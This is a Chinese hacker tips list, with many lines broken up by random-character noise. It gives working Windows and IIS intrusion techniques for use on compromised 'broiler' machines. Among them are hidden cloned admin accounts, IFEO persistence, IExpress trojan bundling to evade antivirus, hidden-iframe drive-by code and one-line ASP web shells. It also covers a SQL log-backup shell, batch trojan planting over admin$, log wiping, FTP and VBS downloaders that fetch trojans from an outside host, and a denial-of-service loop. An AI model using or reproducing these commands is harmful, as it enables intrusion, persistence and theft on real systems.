Xp系统修改权限防止病毒或木马等破坏系统,cmd下,6 O! e9 H2 h! E& r: s. Y2 N
cacls C:\windows\system32 /G hqw20:R
( K1 j. O" v: b思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入$ E1 D( |- ^$ [( U4 C
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F7 v$ m+ O; n' O6 I% M0 c& {& p
% Z5 ]# d$ z$ f; ]6 u2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。% q* u+ H! k& H% k
. p% g6 r' q1 Y5 s' l3 f8 _
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。! S3 X5 m# E; |: `' L
, A8 C, X. _' u4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
' Y% {) } ~1 {1 m) Y! S! V- V. V6 c
5、利用INF文件来修改注册表) `3 \) A5 |9 h5 B2 d( B4 J# e4 H5 b7 U
[Version]
% T$ o# |- L2 y. ^! YSignature="$CHICAGO$"
7 I* W, t5 w/ }& Q[Defaultinstall]
; Z% m3 m1 @+ M" v* CaddREG=Ating/ |9 w2 v6 B' A/ u5 l& h3 y5 [9 X
[Ating]7 Z: B( X1 q6 T) J+ {: i; C
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
6 O+ w* ~( j- A! m% D8 _以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
+ J; D# y; m" v2 F5 frundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径. V8 L8 }3 }4 E7 z3 s2 b
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU0 N; K% V* O. s# U+ V F
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
) f' W _ Q2 o+ n gHKEY_CURRENT_CONFIG 简写为 HKCC
" h4 S: b x: L/ u* L0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
# }' [) [; E8 _) z9 F"1"这里代表是写入或删除注册表键值中的具体数据
3 s# t( F3 S. { B* R2 u) [7 K: T$ k) _* {4 f3 {. c1 V
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,' d% R6 S* h3 M. s' ~+ [
多了一步就是在防火墙里添加个端口,然后导出其键值
* |4 i# b( @: ^4 M& n3 D' {[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
; N+ e M" |8 K1 D/ u
" Z3 ]' t5 x9 g" j! O7 J8 `% J4 P7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽8 e1 Q6 E* I9 K
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。& w& h# H$ X2 J) e W3 o' e
# U5 l' l; l; Y" C8 Y- @: J9 Y
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。8 ^# m1 m( F7 f! e! P
, M- n1 u1 t, `$ m$ L+ E) b9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
6 D6 i" L2 o% b8 |: Z$ M0 v& D$ E可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
, L' U: E9 @8 z
5 I3 v1 w$ R/ o; K" n' j, e' |10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
& p4 M- i- t, m* S: G1 ]* _ k5 A& i/ b" _+ y0 p6 I" F8 m
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
! {) ?9 {6 C4 N用法:xsniff –pass –hide –log pass.txt
8 R5 _" Q" u# S" o t" H% o- d
W3 V) \, j' N# z1 p) y12、google搜索的艺术 k# q* C4 v d" R2 X {
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”+ H: I. M. J/ H
或“字符串的语法错误”可以找到很多sql注入漏洞。
- ^. q) U9 O0 b* b+ M ~& C
: J7 j) n( z) ^* j2 B2 Q13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。% l8 n5 B2 z; v
# i& n' M9 m s( g4 `% y14、cmd中输入 nc –vv –l –p 1987
# N' V7 m+ e b4 L* `/ x8 g- O9 ^6 R5 l做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃3 t8 v+ p' f& i0 o8 Y
! q! g; N3 i% M( b: o1 m
15、制作T++木马,先写个ating.hta文件,内容为4 A! q' h5 h4 h: b) P
<script language="VBScript">9 K9 M3 R4 f8 A2 E
set wshshell=createobject ("wscript.shell" )- [' D7 I: b3 {6 w9 G/ k
a=wshshell.run("你马的名称",1). f( ]# h }5 V S7 J
window.close" f' i+ V0 j3 `7 }$ l3 D) b
</script>- S/ m6 A6 L" p4 S* m" i0 J
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。8 K0 T: Z6 `2 W3 C4 _" C" |
' B/ x$ v5 q4 F: d, ~+ R3 `2 B16、搜索栏里输入" s8 L$ G% u- _8 {# l' D/ \! d
关键字%'and 1=1 and '%'='& Z& y/ y; m: Q. G5 O
关键字%'and 1=2 and '%'='. s: ^1 q( Y! g
比较不同处 可以作为注入的特征字符' R8 n% v( F% S* }9 Z2 j; ^
' Q) p8 y4 w9 b z0 j4 ~+ X. Z3 P
17、挂马代码<html>
& H# b* v, ]* i<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>8 R3 o9 l" s/ R w5 G. F, y
</html>: M+ V4 d$ ?# E1 p( d% N
! t+ e {# u" c: L8 F! K3 d. u
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,! r) q. v$ D( P, d' S
net localgroup administrators还是可以看出Guest是管理员来。; j( f: K0 e7 b# E5 f0 [/ G
8 t! H9 U: J R; N1 Q
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
( ^; z5 F* q* ]用法: 安装: instsrv.exe 服务名称 路径) Y/ C% e) N* D; N
卸载: instsrv.exe 服务名称 REMOVE
d! X1 D$ `- N- Q, L) J( T* J6 Q! i& q. o% x% p3 w" L
1 A* S! T o% D6 h4 g21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
! T; x# h% G, k+ K不能注入时要第一时间想到%5c暴库。( y0 r' {0 Z# q2 o V5 [3 B
; T, {7 e1 W4 ^2 C1 Y22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~/ b6 k! w! d, ?( O1 A; j) X
9 g. Q8 z8 S" [/ i" x3 ]23、缺少xp_cmdshell时
9 B3 t+ s% Y* h+ Y1 F尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'8 B; u# z% r6 e* Y2 @0 f+ w
假如恢复不成功,可以尝试直接加用户(针对开3389的)* E9 c5 r& j! P0 M
declare @o int" ~5 t! z! U3 Z/ ?6 F
exec sp_oacreate 'wscript.shell',@o out0 O' Q9 ~& l1 ]& l
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员- P; |$ S4 r: d( m `! [
) P: o4 }' U3 Q/ R
24.批量种植木马.bat' S4 Z, V& R }
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
2 R* J2 I* u7 Q1 v& ^. Pfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
/ a5 _; Z& }/ _# P4 a2 S扫描地址.txt里每个主机名一行 用\\开头; L& _) y7 _. j9 n8 V: ]) B
& z P5 p! h' U25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。4 }" \+ ^; k. A3 P
3 f. L6 V" F; C7 H* [
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名./ r- y0 n& W0 G* U5 B
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
5 p. o/ u! h7 t9 L& ]2 a.cer 等后缀的文件夹下都可以运行任何后缀的asp木马. j5 r6 E( Y! s! d' ^
6 Z! f: c! o6 A/ P+ q6 \27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
- r) S6 h* X5 g- D9 ]+ F然后用#clear logg和#clear line vty *删除日志
) v: |; `5 H+ }' r' _9 G2 J3 s7 Z
. x1 _0 D" h6 c) m# Z! F* f( d$ f/ O( b28、电脑坏了省去重新安装系统的方法
2 _/ [' t! Q, f/ Y% F纯dos下执行,
7 ~3 a* R7 s1 R+ z/ x1 vxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
/ z3 B: K) g' f, a2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config$ G( h+ Z& t A2 G+ {, q
0 }$ B9 O$ G: B( b% {
29、解决TCP/IP筛选 在注册表里有三处,分别是:
6 \4 y! { R) iHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
1 S; n! o1 n0 t- G3 rHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip1 e9 Y( n! e5 t7 t% ?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; n% l% p7 l }; C! q. A5 G分别用
! j( `- {2 _1 A1 j& G2 j$ E" {3 sregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
" [4 l& Q4 V/ F4 j' u5 E- C. Hregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip4 ~( F8 {3 l4 [" r
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 z/ f/ {( L7 e9 D命令来导出注册表项
" f; Q# T6 l- R3 s- ]8 ]然后把三个文件里的EnableSecurityFilters"=dword:00000001,
9 O, P9 ]5 X# Z2 I7 m改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用# _3 z5 g/ X @, S7 a- H6 H
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
3 D5 Z: s+ X6 D0 h% j, A0 `3 O" q; n
9 V8 J6 U2 ~3 u30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
4 ]! B# t& D/ S& P! K+ R& T- ~SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
9 _8 R* d# [! d) x
& d! |$ g$ D, d6 P6 |31、全手工打造开3389工具8 c4 p9 l2 _) v$ K4 J0 R$ f
打开记事本,编辑内容如下:- g7 X9 \$ A' u7 o3 u1 ?
echo [Components] > c:\sql' X7 L* X9 s7 f. T* ?# b; j
echo TSEnable = on >> c:\sql& P' y3 T) i1 ?" k5 o
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
. _% h3 C! A& W# u! Z5 G' p" {编辑好后存为BAT文件,上传至肉鸡,执行2 i3 a z! O5 G: l7 h
$ V9 ~- [" T' f0 d9 B" c, y32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马9 C3 t3 i; y# }/ |
( `# b; c3 s: w0 z# T33、让服务器重启
{. |1 Y% G+ f8 \写个bat死循环:: c# h: N1 J$ ^- `
@echo off
4 A0 }9 S/ ~" h0 T:loop1/ r+ f( B9 V+ @' e4 c9 W0 T
cls
' x+ h Y8 U" A; Z' |; ]start cmd.exe2 q* u, m% L; q8 i9 a, y
goto loop16 B" {+ M6 s, l: s! r+ P! G
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
' Q7 E3 g7 ?3 M( D- ~
( E+ L. `! L& n9 ?, Q4 @34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
- O) j, T# n: m5 Z6 K8 ^: f@echo off
1 ] X( F* n7 D5 |) @date /t >c:/3389.txt) \+ s N) [# Y# z# o
time /t >>c:/3389.txt
8 L7 A6 n- y% u! l" ]3 D4 Nattrib +s +h c:/3389.bat0 }7 l h3 K+ M; H
attrib +s +h c:/3389.txt
5 J4 e" ~$ O5 X! \netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt$ K" v8 L% E |, j1 A5 D9 V& }
并保存为3389.bat$ g6 j8 b' O ^9 T
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号! u. m5 x6 S3 ]6 g6 R$ R# e4 V
( R i/ m# X( U- c35、有时候提不了权限的话,试试这个命令,在命令行里输入:. q7 b( J4 U& `1 M, n* G
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
6 S) L3 d2 s7 C6 L4 U输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。0 P, R9 I0 q4 u; s: S6 L4 m
& v' r) E0 e$ G. ?+ x! j36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件+ Z. c; H3 B, r X1 n
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址7 d0 Y& |" b3 [, J& D0 M
echo 你的FTP账号 >>c:\1.bat //输入账号
% ]4 S$ b6 V) f$ A( T3 q2 \9 techo 你的FTP密码 >>c:\1.bat //输入密码
% v+ a& u4 {. [$ q2 Cecho bin >>c:\1.bat //登入0 z, _* z! B% n) z- R
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
' x6 `9 t$ [5 Y3 f6 m& Qecho bye >>c:\1.bat //退出
5 i( ?. a/ c8 e' R! c& Q然后执行ftp -s:c:\1.bat即可* i3 ], I% \5 ?& M
0 P! p% u8 L' u& y6 i
37、修改注册表开3389两法
' F4 u w+ B% X6 y(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表8 R6 A3 l; }6 a) |9 S! @: f
echo Windows Registry Editor Version 5.00 >>3389.reg! w/ @0 G, ~7 w' @4 c- w
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg4 Q4 y9 f" W1 z+ N/ `0 S
echo "Enabled"="0" >>3389.reg
" X) U y8 B8 q4 cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows2 d3 s B& R T! n5 Y
NT\CurrentVersion\Winlogon] >>3389.reg5 J+ Y) K& U2 B3 c- [
echo "ShutdownWithoutLogon"="0" >>3389.reg
, v# E) r0 V3 d/ | H ?echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]! W" c2 A! s' K. I! m' K
>>3389.reg) e# F& z# _3 T9 y9 f' e
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg" l& L: k$ v( }& m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
8 z+ M8 j- H$ b1 _7 Z% V2 p>>3389.reg9 `$ {, j6 I# s# r) n
echo "TSEnabled"=dword:00000001 >>3389.reg
1 S y: q. L' i- e" D6 V9 P: D4 ]0 n. vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg: x6 C. _2 `# Y8 d/ D' I% V3 H+ K
echo "Start"=dword:00000002 >>3389.reg
* C. o: |# ^( [. L% B# Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
( d# Y" p6 t4 N. C>>3389.reg7 ]2 F6 k# }7 O& d+ t8 J
echo "Start"=dword:00000002 >>3389.reg) ]( d6 @8 q. |( X
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg$ |9 w |9 s2 U- |! V
echo "Hotkey"="1" >>3389.reg
' f) U4 v$ D" n" j; R' l0 S4 Secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- C7 G' u- k; Y3 w% M8 a
Server\Wds\rdpwd\Tds\tcp] >>3389.reg( D( |; H. H7 f! o; _: @8 [9 s
echo "PortNumber"=dword:00000D3D >>3389.reg! t' O. I- L/ g3 }3 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal, ], g2 o' N1 `& y, ?0 j' D
Server\WinStations\RDP-Tcp] >>3389.reg
. s; Q; Z7 D1 P$ H+ ~echo "PortNumber"=dword:00000D3D >>3389.reg
) K5 B4 l. {7 x: W# r把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
7 ~1 X" j4 q5 i- R/ {2 M& |$ X(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
1 y, ~5 d, R. j+ g3 V因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
! j( C" w h) ^* F0 b(2)winxp和win2003终端开启& ^/ E1 G" t9 ^( H) b$ }
用以下ECHO代码写一个REG文件:
1 b, r$ N3 J9 X) Techo Windows Registry Editor Version 5.00>>3389.reg
1 d& F- w/ U4 a4 Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 O2 A" K. p% s7 H. i, {Server]>>3389.reg a. B0 @% ?5 x( M" j8 H, ?- b
echo "fDenyTSConnections"=dword:00000000>>3389.reg
$ |# P0 N2 S: q3 Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 |4 K; U) v" ^- k: gServer\Wds\rdpwd\Tds\tcp]>>3389.reg
7 g3 d% |4 l/ b5 u# I4 N2 @8 Decho "PortNumber"=dword:00000d3d>>3389.reg
+ S' Z6 a$ i" T$ H3 I s) H. oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 p1 Y) g$ Z. d4 a. \- V, ~Server\WinStations\RDP-Tcp]>>3389.reg
" ~. r: x- @' v, ~% yecho "PortNumber"=dword:00000d3d>>3389.reg
1 K) H8 s4 K7 T$ M) O$ _然后regedit /s 3389.reg del 3389.reg
# p1 W* h3 g3 ^XP下不论开终端还是改终端端口都不需重启
. o5 r% t& }* u4 h" E% X/ m4 D
; ]& Z, [; C& m7 V38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
& c: ], w) o& J. k用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
& ~* G( a1 [! ]6 N9 z' C, C3 i! P: T# y/ K6 @
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!2 H% b+ q* j F7 v) p1 W2 _2 z
(1)数据库文件名应复杂并要有特殊字符
% w, D2 l" z3 g6 y9 T(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
3 d4 B9 P0 N2 b) d! s将conn.asp文档中的5 c# N3 i! Y. [. l# `+ N
DBPath = Server.MapPath("数据库.mdb")! _7 {8 ^ z& u* }2 _
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath G! g& |7 U) z
/ V' u) s. f6 A( A9 {修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置0 u4 A `) E8 p$ q6 r
(3)不放在WEB目录里9 S# P- O0 Z5 P. R2 q; o8 [! d" d
* ^. S6 Q1 t: O$ F
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
& s/ o- ?" P! j4 @' f+ x( T可以写两个bat文件
8 V0 G4 ~& ^1 g@echo off
6 [) M& C; R/ P6 q( a5 ?2 `! g) p@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
, p3 B* ^: I" `& \@del c:\winnt\system32\query.exe
( h( C+ D* ~: c" d2 |@del %SYSTEMROOT%\system32\dllcache\query.exe
% w, `9 k1 N7 X/ L. j@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的) P" D( T! u# L* x
9 m4 u R ?, _. Y3 L@echo off0 Z/ Q$ ~: i( G1 `# x: F
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe) b9 I6 S: h4 n' T+ K; \
@del c:\winnt\system32\tsadmin.exe# H$ t/ F1 W. A0 j$ P6 o! j
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex4 F. G6 u- j& M- z0 g
1 p4 y/ g- T0 a+ {. ~41、映射对方盘符; e1 a4 _9 ]7 Q! c9 G
telnet到他的机器上,
1 f7 [0 O+ j$ Knet share 查看有没有默认共享 如果没有,那么就接着运行5 }- Y/ Z' @4 M5 W
net share c$=c:
" `) X: |: g9 mnet share现在有c$: P1 X+ W* w- K) }" o
在自己的机器上运行/ ~$ X3 ]! e8 l2 ^ I+ I/ E
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
a! A/ h) N* |1 x: Y$ V7 v: [1 M( u' u8 s5 X! \9 s2 k3 ~
42、一些很有用的老知识
- F. V8 Z( ^9 G; K( ~; k/ k$ wtype c:\boot.ini ( 查看系统版本 ); v0 G* ?% B6 S
net start (查看已经启动的服务): e- {7 [6 }( t) m# \) ]8 u$ h
query user ( 查看当前终端连接 )) V- P7 A7 f" m% G2 }" Z
net user ( 查看当前用户 )
F3 k3 t2 a) i: Tnet user 用户 密码/add ( 建立账号 )
0 k. _. @9 T$ |, K" ~, x9 L: Jnet localgroup administrators 用户 /add (提升某用户为管理员)" }5 @5 Z( W: Y; t
ipconfig -all ( 查看IP什么的 )8 A9 t, M, C& u3 l6 o6 t# S
netstat -an ( 查看当前网络状态 )% x- T/ x9 J3 {6 d, }1 b" N
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
; h; w7 F6 y( |0 R4 L; }! ?' t克隆时Administrator对应1F4$ o9 Y" H- J2 e
guest对应1F58 B! K6 z8 O& D$ v% P7 k; t+ }; z/ H8 d
tsinternetuser对应3E8" J* Q- A! S4 O5 ?; d! B
. h# q, d. b( }8 k) T- u1 p5 s7 B
43、如果对方没开3389,但是装了Remote Administrator Service0 B, K9 i) o5 I, f
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
7 Z8 ]. z9 o4 h* T w: f解释:用serv-u漏洞导入自己配制好的radmin的注册表信息8 x" I2 V+ w0 B3 |9 z) X: E% q
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"6 _- u& ]& j6 |' P' i( m c
5 @' n7 F. M" O8 {! m) Q44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
) m; i y( x6 Z8 v. z' ~" `6 [本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)/ e0 c/ x0 l8 M; d5 q0 G; R
7 }% u6 C+ u4 P- F4 u45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入): B& c3 i# M; I! _
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open5 ~/ }, n. F: j; {5 a$ X6 @+ n3 U
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
# y0 ]; H9 y8 w# a) L: i+ n% `CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =. q! f) c: r; n/ G
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
2 K; |4 b3 W s8 I) ] f9 X7 L(这是完整的一句话,其中没有换行符)
6 C; a6 Q$ u X3 S然后下载:$ j; I2 @* A* s
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
* r6 G& _( K/ N% D
5 R. r* ]8 r5 D, E0 `, \: y* T% E46、一句话木马成功依赖于两个条件:$ U, h" F$ R4 |, D$ M$ Y$ j
1、服务端没有禁止adodb.Stream或FSO组件5 z0 I* H. }' V8 o2 ^, W
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
% _9 r( \' k6 h, }2 x# O+ ^* ?$ v/ i3 C" S- ?$ b) g* U; {
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
6 K5 c' [+ X g+ g9 X;alter database utsz set RECOVERY FULL--
" l" u) C- l1 ?# r6 [+ y;create table cmd (a image)--2 A- d2 Q4 m0 R& I4 k
;backup log utsz to disk = 'D:\cmd' with init--% m" ~8 i1 s2 Q7 Y. p! b
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--+ e% F: J5 _9 V
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--: c& q3 f9 g5 D* B( Z5 \
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
' h/ c! h! X4 N$ k# G" H5 C
* x! P3 G; e! w- @3 X48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:/ _, A4 e; A7 A# Z2 m
$ b, s8 J% V. D) I8 b( X$ |用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
9 K( j$ N5 F+ W+ {9 J. W7 L所有会话用 'all'。9 y% [/ |& ^' H$ ~7 g
-s sessionid 列出会话的信息。+ t* [) G; R/ k
-k sessionid 终止会话。
) P+ v6 I1 |- J! h-m sessionid 发送消息到会话。* _* i8 u' P5 j! u2 b/ H$ ]$ x. e
# s1 w8 n7 n3 ?; c, H' R7 \
config 配置 telnet 服务器参数。
! g2 u. j+ U n( Z6 L% t
0 I4 Q- O4 W& Q& Ycommon_options 为:
$ {% t+ E# P9 q# U) d9 P-u user 指定要使用其凭据的用户& {; h k2 o% J+ F: Z: p8 R# R8 j
-p password 用户密码6 c U+ e4 x" x! q3 h; t7 X+ T$ S
+ |/ c) D+ V3 T, x2 Z( ]4 [% @config_options 为:
4 h, g [6 B; {$ r. adom = domain 设定用户的默认域
" c2 l1 g4 i) |0 u9 J: P: \# m5 O% actrlakeymap = yes|no 设定 ALT 键的映射
' Q D# ~- u7 {4 N/ S$ {$ C) dtimeout = hh:mm:ss 设定空闲会话超时值 K$ W! ], a) u: }
timeoutactive = yes|no 启用空闲会话。 c; y) g5 l; h; r& ^$ A" j
maxfail = attempts 设定断开前失败的登录企图数。7 f9 @4 ^! N+ }. ?6 T
maxconn = connections 设定最大连接数。( [3 q/ {6 e. K/ s1 }- w* b
port = number 设定 telnet 端口。
2 C7 T# x3 C' W! Ksec = [+/-]NTLM [+/-]passwd
: `* Q6 ~- _7 C. y( ]3 _. r设定身份验证机构4 J5 d& ~4 w9 Z1 g9 @0 v5 |5 L" \
fname = file 指定审计文件名。
{% t; \5 n" t0 b/ v) Afsize = size 指定审计文件的最大尺寸(MB)。
8 `9 ]9 }) ]: T; }mode = console|stream 指定操作模式。
0 x \3 K+ N0 {auditlocation = eventlog|file|both2 l: e/ n( u3 m* Q8 i
指定记录地点. p2 n1 v Z8 b, Q8 L4 Z
audit = [+/-]user [+/-]fail [+/-]admin6 O' k/ m% M0 _9 [( ?$ P0 d8 t
/ \6 s, J( {5 a+ n# @' R& ` F
49、例如:在IE上访问:
. K3 Q, r; h1 s/ y; Qwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/ f3 k1 F# G2 w5 M4 X- {
hack.txt里面的代码是:: [3 o' I$ P+ k7 J
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
5 S* e$ N1 }3 W; W* n把这个hack.txt发到你空间就可以了!$ M; P) E! i. c" `3 S/ _
这个可以利用来做网马哦!% S0 w* g5 v! p: K' G: I6 @2 D q
; H3 j/ }7 ]" p1 C7 x. u50、autorun的病毒可以通过手动限制!2 c1 }# q7 p9 h
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!9 H) o" `1 \9 d* Q: \
2,打开盘符用右键打开!切忌双击盘符~
6 M4 t( _( O' x" H* Z3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!0 L0 h6 b3 O3 c3 n0 t
* ?4 |7 x6 B+ S' |51、log备份时的一句话木马:" t- m0 V8 ?+ f8 l
a).<%%25Execute(request("go"))%%25>
3 g% D3 `% V: Db).<%Execute(request("go"))%>
; N3 v$ h u. r& dc).%><%execute request("go")%><%
3 Y+ m( v+ K: A, I5 bd).<script language=VBScript runat=server>execute request("sb")</Script>
G- H! y: l4 He).<%25Execute(request("l"))%25>
+ _) T2 F- T/ I( rf).<%if request("cmd")<>"" then execute request("pass")%>
& c7 L+ P3 T9 Y% G& e2 n* I" A! m/ A) B, @8 \
52、at "12:17" /interactive cmd& Y: X+ q/ ^( m- Z2 [2 e& f
执行后可以用AT命令查看新加的任务
